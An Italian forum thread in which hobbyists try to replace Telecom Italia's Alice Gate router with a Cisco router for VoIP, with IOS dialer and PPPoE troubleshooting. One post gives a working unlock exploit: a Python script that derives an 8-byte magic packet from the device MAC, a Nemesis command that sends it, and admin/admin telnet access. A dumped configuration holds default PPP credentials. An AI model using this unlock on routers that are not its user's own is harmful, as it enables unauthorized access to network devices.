Alice Voce e Cisco 2610

[livan74]

Salve a tutti, vorrei sapere se c'e' il modo di configurare il router Cisco 2610 con il voip di telecom.
Ho letto in giro un pò di materiale ed ho trovato solo il modo di interfacciare un centralino asterisk con il voip di telecom, permettendone così il funzionamento su normali apparecchi SIP o ATA registrati su asterisk, ma sempre e comunque con il router alice gate.
Il problema di fondo a quanto ho capito è risucire a decriptare la password SIP che il router telecom invia assieme al numero di telefono associato per l'autenticazione.
Entrando però in una pagina di configurazione un pò più avanzata del router telecom sono entrato nella sezione Voice over IP, e qui vengono visualizzati tutti i parametri fondamentali del voip, tra cui la password "asteriscata".
Dal momento che esistono dei programmi, come ben saprete, che visualizzano le password asteriscate, ne ho provati tre e tutti e tre hanno visualizzato la password "{[(+-)]}" senza ovviamente le virgolette (").
Vorrei riuscire a capire meglio il principio di funzionamento del voip di telecom e magari studiarci un pò su e magari col vostro aiuto riuscire in questa impresa!

Attendo notizie!

[ep]

Salve a tutti, vorrei sapere se c'e' il modo di configurare il router Cisco 2610 con il voip di telecom.

Sicuramente c'è, ma bisogna ancora testarlo

Il problema di fondo a quanto ho capito è risucire a decriptare la password SIP che il router telecom invia assieme al numero di telefono associato per l'autenticazione.

Non è proprio così; ti consiglio di scaricare il tutorial per l'interfacciamento con Asterisk, che spiega la cosa in maniera più dettagliata.

La password viene inviata dal router Alice Gate in chiaro. Il problema con alcuni dispositivi è che la password è lunga 64 caratteri (caratteri ASCII che rappresentano una cifra esadecimale; è probabile che sia generata algoritmicamente partendo dai dati dell'utente, forse con l'inserimento di una stringa segreta), ed non tutti i dispositivi non sono capaci di accettare password così lunghe.

A parte questo problema, guardando le configurazioni, si direbbe che l'Alice Gate instauri due differenti connessioni PPP sul medesimo circuito virtuale ATM. Non ho provato, ma non penso che questo sia un problema per l'IOS. Ammettiamo che tu abbia una linea aziendale e che il MAC address del tuo router Alice Gate sia 01:02:03cd:ef.

Bisognerebbe creare due interfacce dialer. Una si autentica con username "[email protected]" e password "alicenewag"; riceverà l'IP statico della connessione, il gateway 192.168.200.1 (credo) e andrà usata per la connessione ad Internet in generale. L'altra si autentica con "010203ABCDEF-0013C8" e la stessa password, riceve un gateway diverso (192.168.100.1?) e andrà usata per il VoIP.

Dall'Alice Gate devi anche richiedere le password per il servizio VoIP; poi, con il policy-based routing, puoi stabilire che le connessioni dai dispositivi VoIP vadano sulla seconda connessione PPP, e tutte le altre sulla prima.

Ciao!

[Ogekuri]

Bisognerebbe creare due interfacce dialer. Una si autentica con username "[email protected]" e password "alicenewag"; riceverà l'IP statico della connessione, il gateway 192.168.200.1 (credo) e andrà usata per la connessione ad Internet in generale. L'altra si autentica con "010203ABCDEF-0013C8" e la stessa password, riceve un gateway diverso (192.168.100.1?) e andrà usata per il VoIP.

E nel caso di un abbonamento non business? Quello da casa con la aliceadsl per intenderci.

In che modo hai dedotto lo username della seconda interfaccia?

Io sarei nelle condizioni di provare, visto che ho già asterisk con pivelli, aladino voip, e un alice gate che non vede l'ora di essere sostituito dal un 1721.
--
Ciao,
Fra

[ep]

Bentrovato Ogekuri!

E nel caso di un abbonamento non business? Quello da casa con la aliceadsl per intenderci.

Credo che basti sostituire "alicebiz" con "aliceres". Però…

In che modo hai dedotto lo username della seconda interfaccia?

Ecco. Mi aspetto che la configurazione di un Alice Gate attivo oggigiorno sia come questa, ma per avere la certezza, ti conviene sbloccare il tuo e scaricare la configurazione.

Per sbloccare il Pirelli, grazie all'exploit uscito verso la fine dell'anno scorso, bisogna mandargli un pacchetto di 8 byte speciali. Prima di tutto salva lo script Python:

Codice: Seleziona tutto

#!/usr/bin/python
import md5
mac = '010203abcdef'
print md5.new((mac + '040767100281fa66114168111701052271041033'
	).decode('hex')).digest()[:8]

(ovviamente mettici il MAC address del tuo Pirelli) ed eseguilo salvando l'output:

Codice: Seleziona tutto

$ ./sbloccoag.py > payload.bin

Dovresti trovarti il file payload.bin di 8 byte. Invialo all'Alice Gate, ad esempio, con Nemesis:

Codice: Seleziona tutto

# nemesis ip -D 192.168.0.1 -p 255 -P t

(o l'IP del tuo Alice Gate, chiaramente…).

A questo punto potrai fare telnet 192.168.0.1 ed entrare con admin/admin.

Dall'interfaccia puoi fare il dump della configurazione, seguendo i menu 9 --> 1 --> 3. Se lavori da Windows credo che ti convenga salvarla con la funzione capture di Putty o equivalente; da *x puoi usare il comando "script" per trascrivere la sessione telnet su di un file.

Io sarei nelle condizioni di provare, visto che ho già asterisk con pivelli, aladino voip, e un alice gate che non vede l'ora di essere sostituito dal un 1721.

Ottimo, possiamo provare!

Ciao!

[Ogekuri]

Credo che basti sostituire "alicebiz" con "aliceres". Però…

Te lo confermo ecco l'output:

Codice: Seleziona tutto

da ==== /var/running_cfg.xml ====

<pppsrv_8_35>
<ppp_conId1 userName="????????????-0013C8" password="YWxpY2VuZXdhZw==" serviceName="" idleTimeout="0" ipExt="disable" auth="auto" useStaticIpAddr="0" localIpAddr="0.0.0.0" Debug="disable" idleMngDisconnectTime="0" reconnectTime="0" natPersTime="3600" pppIsDataInterface="Service_mgmt" NATExternalIPAddress="0.0.0.0" NATStartIPAddress="0.0.0.0" NATEndIPAddress="0.0.0.0" NATInternalIPAddresses="" NATExcludedInternalIPAddresses="" MTU="1492" MRU="1492"/>
<ppp_conId2 userName="" password="" serviceName="" idleTimeout="0" ipExt="disable" auth="auto" useStaticIpAddr="0" localIpAddr="0.0.0.0" Debug="disable" idleMngDisconnectTime="0" reconnectTime="0" natPersTime="3600" pppIsDataInterface="Generic" NATExternalIPAddress="0.0.0.0" NATStartIPAddress="0.0.0.0" NATEndIPAddress="0.0.0.0" NATInternalIPAddresses="" NATExcludedInternalIPAddresses="" MTU="1492" MRU="1492"/>
<ppp_conId3 userName="[email protected]" password="YWxpY2VuZXdhZw==" serviceName="" idleTimeout="600" ipExt="disable" auth="auto" useStaticIpAddr="0" localIpAddr="0.0.0.0" Debug="disable" idleMngDisconnectTime="0" reconnectTime="0" natPersTime="3600" pppIsDataInterface="Generic" NATExternalIPAddress="0.0.0.0" NATStartIPAddress="0.0.0.0" NATEndIPAddress="0.0.0.0" NATInternalIPAddresses="" NATExcludedInternalIPAddresses="" MTU="1492" MRU="1492"/>
</pppsrv_8_35>

<wan_8_35>
<entry1 vccId="1" conId="1" name="Telecom Italia" protocol="PPPOE" encap="LLC" firewall="enable" nat="enable" igmp="disable" multicast="disable" vlanId="-1" service="enable" connTrigg="AlwaysOn" connType="IP_ROUTED" shaping_rate="-1" shaping_burst_size="0" dns="enable" dynamic="enable" ipdns1="151.99.0.100" ipdns2="151.99.125.1" instanceId="1509949442"/>
<entry2 vccId="1" conId="2" name="Bridged" protocol="PPPOE" encap="LLC" firewall="enable" nat="enable" igmp="disable" multicast="disable" vlanId="-1" service="enable" connTrigg="" connType="PPPOE_BRIDGED" shaping_rate="-1" shaping_burst_size="0" dns="enable" dynamic="enable" ipdns1="151.99.0.100" ipdns2="151.99.125.1" instanceId="1509949443"/>
<entry3 vccId="1" conId="3" name="User Session" protocol="PPPOE" encap="LLC" firewall="enable" nat="enable" igmp="enable" multicast="enable" vlanId="-1" service="enable" connTrigg="X_TELECOMITALIA_IT_Conditional" connType="IP_ROUTED" shaping_rate="-1" shaping_burst_size="0" dns="enable" dynamic="enable" ipdns1="151.99.125.1" ipdns2="151.99.0.100" instanceId="1509949444"/>
</wan_8_35>

Prima di tutto salva lo script Python:

Ho avuto qualche problema con lo script pyton ( forniva un payload vuoto) e alla fine ho usato usato il file di saxdax.

Ora vado a recuperare il router, ci sentiamo dopo.
--
Ciao,
Fra

[ep]

Ho avuto qualche problema con lo script pyton ( forniva un payload vuoto) e alla fine ho usato usato il file di saxdax.

Perché sono un cretino e ho dimenticato il "print". Ora faccio l'edit, così se in futuro serve a qualcuno non incontra lo stesso problema…

Ciao!

[Ogekuri]

Perché sono un cretino e ho dimenticato il "print". Ora faccio l'edit, così se in futuro serve a qualcuno non incontra lo stesso problema…

Ah ecco, non essendo pratico di python non mi ero accordo della svista.


Ho messo su il cisco, ma ho qualche problema.

Ho definito una seconda dialer interface Dialer1 dello stesso dialer pool 1 della Dialer0.

Ho definito una rotta per il mio proxy voip sulla Dialer1 e una nat source per l'ip del mio asterisk sempre sulla Dialer1 ma sembra non andare.

Sembra che non prenda l'ip, rimane in

Codice: Seleziona tutto

Dialer1 is up, line protocol is up
  Internet address will be negotiated using IPCP

[ep]

Mi viene un dubbio: guardando qui, dice:

Prior to Cisco IOS Release 12.4(15)T, one ATM PVC supported one PPPoE client. With the introduction of the Multiple PPPoE Client feature in Cisco IOS Release 12.4(15)T, one ATM PVC supports multiple PPPoE clients, allowing second line connection and redundancy. Multiple PPPoE clients can run concurrently on different PVCs, but each PPPoE client must use a separate dialer interface and a separate dialer pool.

Hai / puoi installare una versione >= 12.4(15)T?

EDIT: ho controllato, per esistere per il 1721 esistono, però richiedono almeno 64 di RAM e 32 di flash, che raramente uno ha già installati

[Ogekuri]

EDIT: ho controllato, per esistere per il 1721 esistono, però richiedono almeno 64 di RAM e 32 di flash, che raramente uno ha già installati

Errata corrige: ho un 1720 che vede solo 48 ram (ma credo che il modulo sia da 64), la flash credo sia da 128.

Ora ho la 12.4(13b)



-sigh-

[ep]

Errata corrige: ho un 1720 che vede solo 48 ram (ma credo che il modulo sia da 64), la flash credo sia da 128.

Ora ho la 12.4(13b)



-sigh-

Confermo. Ho provato a supplicare un 1720 in aramaico, ma niente, più di 48 non me li ha visti ed infatti nel feature navigator non esiste alcuna 12.4T per il 1720…

[Ogekuri]

Errata corrige: ho un 1720 che vede solo 48 ram (ma credo che il modulo sia da 64), la flash credo sia da 128.

Ora ho la 12.4(13b)



-sigh-

Confermo. Ho provato a supplicare un 1720 in aramaico, ma niente, più di 48 non me li ha visti ed infatti nel feature navigator non esiste alcuna 12.4T per il 1720…

Peccato, poi tra l'altro ha solo 16m di flash ... potrei provare con qualche router che ho al lavoro, ma sarebbe solo didattica visto che non sono fanless e a casa non ce li metterei mai.

-doppio sigh-

[livan74]

Ragazzi io ho un 2610 con 64/16mega e l'ultima versione di IOS per questo router, ma mi dovete dire cosa devo fare perchè non è che ci abbia capito molto...
Ciao